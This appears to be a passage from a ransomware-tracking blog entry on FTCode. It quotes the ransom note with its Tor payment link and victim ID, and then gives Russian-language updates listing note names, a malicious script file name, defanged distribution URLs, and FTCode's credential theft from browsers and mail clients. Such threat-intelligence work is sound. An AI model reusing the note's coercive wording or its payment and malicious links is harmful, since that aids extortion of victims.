Yes, You can Decrypt Files Encrypted!!!
Your personal ID: fbe8dd2b-9f8e-4753-b196-76554809b1f7
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=fbe8dd2b-9f8e-4753-b196-76554809b1f7
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party s oftware harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.


Обновление от 30 октября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR
URL: xxxx://static.nexilia.it
xxxx://mobi.confessyoursins.mobi

Обновление от 1 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR


Обновление от 7 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
URL: xxxp://dbi.shadysidechurch.com/

Обновление от 28 ноября 2019:
Пост в Твиттере >>

 

На скриншотах выделен код инфо-стилера. 

Обновление от 10 декабря 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Файлы: ScanDocumento__11725497dfc376f565dc41df11738bdaff.vbs
Результаты анализов: VT + AR

Обновление от 11 декабря 2019:
Топик на форуме >>
Расширение: .<random> или .<random{6}>
Записка: READ_ME_NOW.htm

Обновление от 20 января 2020: 
FTCode теперь собирает учетные данные из браузеров (Internet Explorer, Mozilla Firefox, Google Chrome) и email-клиентов (Mozilla Thunderbird, Microsoft Outlook). Способы доступа отличаются: а) в случае с Internet Explorer и Microsoft Outlook, FTCode получает прямой доступ к ключам реестра; б) в случае с Mozilla Firefox, Mozilla Thunderbird и Google Chrome FTCode проникает в папки, где эти приложения хранят учетные данные.
После сбора информации FTCode отправляет её своим операторам, используя запрос POST, отправленный на его командно-контрольный сервер (C&C), а имена пользователей и пароли будут закодированы с использованием схемы кодирования Base64. 
Подробнее в статье на сайте BleepingComputer >>

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + Tweet + myTweet
 ID Ransomware (ID as FTCode)
 Write-up, Topic of Support
 Earlier tweets I did not know about: Tw, Tw 

Added later:
Write-up BleepingComputer (October 3, 2019)
Write-up Certego (October 2, 2019)
*

 - Видеообзор от CyberSecurity GrujaRS

 Thanks: 
 GrujaRS, Michael Gillespie, Marco Bompani, Matteo Lodi
 Andrew Ivanov (author)
 Wojciech S., TG Soft, Certego, Lawrence Abrams
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.